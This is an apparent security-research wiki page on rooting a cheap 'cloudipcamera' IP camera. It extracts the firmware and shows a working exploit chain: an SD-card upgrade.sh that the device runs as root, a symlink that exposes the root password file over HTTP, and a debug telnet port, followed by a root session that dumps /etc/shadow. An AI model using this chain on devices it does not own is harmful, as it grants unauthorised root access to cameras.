<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root$ ls -laht project/<br />
<br />
total 3.2M<br />
drwxr-xr-x 2 rjmendez rjmendez 4.0K Apr 20 12:17 .<br />
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma<br />
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc<br />
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..<br />
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml</pre><br />
<br />
Its called by the init script in /etc/init.d/dev_init.sh<br />
<br />
<pre>#prepare project<br />
unlzma -c /project/*.tar.lzma > /tmp/project.tar<br />
rm /project/*.tar.lzma<br />
<br />
...<br />
<br />
tar -xvf /tmp/project.tar -C /project/<br />
rm -rf /tmp/project.tar<br />
chmod -R 777 /project<br />
<br />
#dev_start<br />
if [ -e /mnt/mtd/flag_debug_dev_start ]; then<br />
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" /mnt/mtd/flag_debug_dev_start existed<br />
else<br />
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" run /project/apps/app/ipc/data/sh/dev_start.sh<br />
cd /project/apps/app/ipc/data/sh<br />
./dev_start.sh<br />
fi</pre><br />
<br />
Extracting it all gives us this.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ unlzma -c ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma > project.tar<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ tar -xf project.tar<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ ls -laht<br />
total 14M<br />
drwxr-xr-x 5 rjmendez rjmendez 4.0K Apr 20 14:03 .<br />
-rw-rw-r-- 1 rjmendez rjmendez 11M Apr 20 14:02 project.tar<br />
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma<br />
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc<br />
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..<br />
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 apps<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 platforms<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 faraday<br />
-rw-r--r-- 1 rjmendez rjmendez 2 Oct 23 2015 kernel_version</pre><br />
<br />
Tons of good data in here! <br />
<br />
'''Gaining root'''<br />
<br />
We have a great entry point as well inside of /project/apps/app/ipc/data/sh/sd_card_insert.sh.<br />
<br />
<pre>#!/bin/sh<br />
<br />
#mount sd_card<br />
if [ ! -d /mnt/sd ]; then<br />
/bin/mkdir /mnt/sd<br />
fi<br />
mount -o noatime,nodiratime,norelatime -t vfat /dev/mmcblk0p1 /mnt/sd<br />
<br />
#run hook<br />
if [ -e /mnt/sd/upgrade/upgrade.sh ]; then<br />
chmod 777 /mnt/sd/upgrade/upgrade.sh<br />
sh /mnt/sd/upgrade/upgrade.sh &<br />
fi<br />
<br />
wget http://127.0.0.1:80/ccm/CcmNotifyRequest/-dvalue-1.xml -O 1.xml<br />
<br />
rm -f 1.xml</pre><br />
<br />
What the hell is going on in /project/apps/app/ipc/data/sh/dev_passwd.sh?<br />
<br />
<pre>path_prompt=/tmp/prompt.debug<br />
path_pass=/tmp/pass.debug<br />
<br />
...<br />
<br />
#Generate ctx if needed<br />
if [ -z $ctx ]; then<br />
ctx_file=/tmp/ctx.dev<br />
if [ -e $ctx_file ]; then<br />
read ctx < $ctx_file<br />
fi<br />
<br />
if [ -z $ctx ]; then<br />
ctx=$RANDOM<br />
echo $ctx > $ctx_file<br />
fi<br />
fi<br />
<br />
...<br />
<br />
${bindir}/mipc_tool -cmd pass -devid ${devid} -prompt ${path_prompt} -pass ${path_pass}<br />
<br />
...<br />
<br />
read pass < $path_pass<br />
read prompt < $path_prompt<br />
echo "pass=${pass}, prompt=${prompt}"<br />
/bin/hostname ${prompt}${promp_eth}${promp_wifi}<br />
echo "root:${pass}"|chpasswd</pre><br />
<br />
It looks like they are generating a new root password after rebooting. Everything is still running as root and the password is in a file at /tmp/pass.debug, we should be able to get in over the serial line but that’s not very sexy.<br />
A look into /project/apps/app/ipc/data/sh/dev_telnet.sh gives us another option.<br />
<br />
<pre>#!/bin/sh<br />
<br />
port=9527<br />
file_flag=/mnt/mtd/flag_debug_telnet<br />
if [ -e ${file_flag} ]; then<br />
mode=on<br />
fi<br />
<br />
usage()<br />
{<br />
echo Usage:$0 [-m,--mode on/off] [-h,--help]<br />
exit<br />
}<br />
<br />
ARGS=`getopt -a -o m:h -l mode:,help -- "$@"`<br />
<br />
#set -- "${ARGS}"<br />
eval set -- "${ARGS}"<br />
<br />
while true<br />
do<br />
case "$1" in<br />
-m|--mode)<br />
mode="$2"<br />
shift<br />
;;<br />
-h|--help)<br />
usage<br />
;;<br />
--)<br />
shift<br />
break<br />
;;<br />
esac<br />
shift<br />
done<br />
<br />
if [ x"${mode}" == xon ]; then<br />
if [ ! -e ${file_flag} ]; then<br />
touch ${file_flag}<br />
fi<br />
<br />
if [ "" == "`ps -w | grep telnet | grep ${port} | grep -v grep`" ]; then<br />
telnetd -p ${port} &<br />
fi<br />
elif [ x"${mode}" == xoff ]; then<br />
if [ -e ${file_flag} ]; then<br />
rm ${file_flag}<br />
fi<br />
<br />
ps w| grep telnetd | grep ${port} | grep -v -E "grep" | while read line<br />
do<br />
pid=${line%% *}<br />
kill -9 $pid<br />
done<br />
fi</pre><br />
<br />
Well well well… Lets create an upgrade folder and throw in this script inside of upgrade.sh on our vfat formatted micro sd card.<br />
<br />
<pre>#!/bin/sh<br />
sleep 45<br />
cd /project/apps/app/ipc/data/http/ && ln -s /tmp &<br />
/project/apps/app/ipc/data/sh/dev_telnet.sh -m on</pre><br />
<br />
After a little bit we should see this show up on the web server.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera$ curl http://192.168.187.254/tmp/pass.debug<br />
264e37dcd841b35344c68e8f95dc8b11</pre><br />
<br />
And then we can try telnet on the nonstandard debug port.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera$ telnet 192.168.187.254 9527<br />
Trying 192.168.187.254...<br />
Connected to 192.168.187.254.<br />
Escape character is '^]'.<br />
<br />
1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254 login: root<br />
Password: <br />
|---------------------------------------------------------------------------|<br />
| A |<br />
| AAA |<br />
| AAAAA |<br />
| AAAAAAA |<br />
| AAAA AA |<br />
| A AAAA AA |<br />
| AAA AAAA AA AAA AAAAA AAA AAAAA AAAAA |<br />
| AAAAA AAAA AA AA AA AA AA AA AA |<br />
| AAAAAAAAAA AA AAA AA AA AAA AA AA AA AA |<br />
| AAAAA AAAA AA AAA AA AA AAA AA AA AA AA |<br />
| AAAAA A AA AAA AA AA AAA AA AA AAAAAA |<br />
| AAAAA AA AAA AA AA AAA AA AA AA |<br />
| AAAAAA AAAA AAA AA AA AAA AA AA AAAAAA |<br />
|===========================================================================|<br />
| |<br />
| http://www.shenzhenmining.com |<br />
| power by (C)shenzhenmining 2012 |<br />
|---------------------------------------------------------------------------|<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# echo "Root password is '264e37dcd841b35344c68e8f95dc8b11'"<br />
Root password is '264e37dcd841b35344c68e8f95dc8b11'<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ls -l /root<br />
-rwxr-xr-x 1 root root 54 Oct 23 2015 welcome.txt<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /root/welcome.txt <br />
welcome to (c)shenzhen mining mipc world!<br />
enjoy it!<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/passwd<br />
root:x:0:0:root:/root:/bin/sh<br />
bin:x:1:1:bin:/bin:/bin/sh<br />
daemon:x:2:2:daemon:/usr/sbin:/bin/sh<br />
adm:x:3:4:adm:/adm:/bin/sh<br />
lp:x:4:7:lp:/var/spool/lpd:/bin/sh<br />
sync:x:5:0:sync:/bin:/bin/sync<br />
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown<br />
halt:x:7:0:halt:/sbin:/sbin/halt<br />
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh<br />
operator:x:11:0:Operator:/var:/bin/sh<br />
nobody:x:99:99:nobody:/home:/bin/sh<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/shadow<br />
root:S5Ada/QN0yHBo:12963:0:99999:7:::<br />
bin:*:12963:0:99999:7:::<br />
daemon:*:12963:0:99999:7:::<br />
adm:*:12963:0:99999:7:::<br />
lp:*:12963:0:99999:7:::<br />
sync:*:12963:0:99999:7:::<br />
shutdown:*:12963:0:99999:7:::<br />
halt:*:12963:0:99999:7:::<br />
uucp:*:12963:0:99999:7:::<br />
operator:*:12963:0:99999:7:::<br />
nobody:*:12963:0:99999:7:::</pre><br />
<br />
This device has never been connected to the internet, lets see what’s running on it.<br />
<br />
<pre>[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ps | grep mipc<br />
600 root 2532 S ./mipc_tool -cmd wd -len 20 <br />
826 root 2664 S ./mipc_tool -cmd debug -server 1 <br />
945 root 2664 S ./mipc_tool -cmd led -dev eth -interval 500 <br />
987 root 2664 S ./mipc_tool -cmd led -dev wifi -interval 500 <br />
1009 root 2668 S ./mipc_tool -cmd led -dev single -interval 500 <br />
1015 root 2664 S ./mipc_tool -cmd click_listen <br />
1063 root 2668 S ../../../../../platforms/faraday-linux-armv5/bin/mipc_tool -cmd tcpproxy --passive-remote 127.0.0.1:23 --remote 218.14.146.199:7024:/tmp/tcp_post.txt --header-notify-file<br />
1179 root 54140 S ./mipc -cont-conf ../../../apps/app/ipc/conf/container.conf </pre><br />
<br />
== Future ==<br />
<br />
We need to look into mipc_tool and the mipc program itself.</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_store.png&diff=2682File:Cloudipcam store.png2017-04-21T01:58:20Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_board.jpg&diff=2681File:Cloudipcam board.jpg2017-04-21T01:54:27Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_bottom.jpg&diff=2680File:Cloudipcam bottom.jpg2017-04-21T01:51:51Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_back.jpg&diff=2679File:Cloudipcam back.jpg2017-04-21T01:51:23Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_profile.jpg&diff=2678File:Cloudipcam profile.jpg2017-04-21T01:50:34Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_front.jpg&diff=2677File:Cloudipcam front.jpg2017-04-21T01:48:54Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_UART_pins.jpg&diff=2676File:Cloudipcam UART pins.jpg2017-04-21T01:37:30Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_mxic25l12835f.jpg&diff=2675File:Cloudipcam mxic25l12835f.jpg2017-04-21T01:32:34Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendez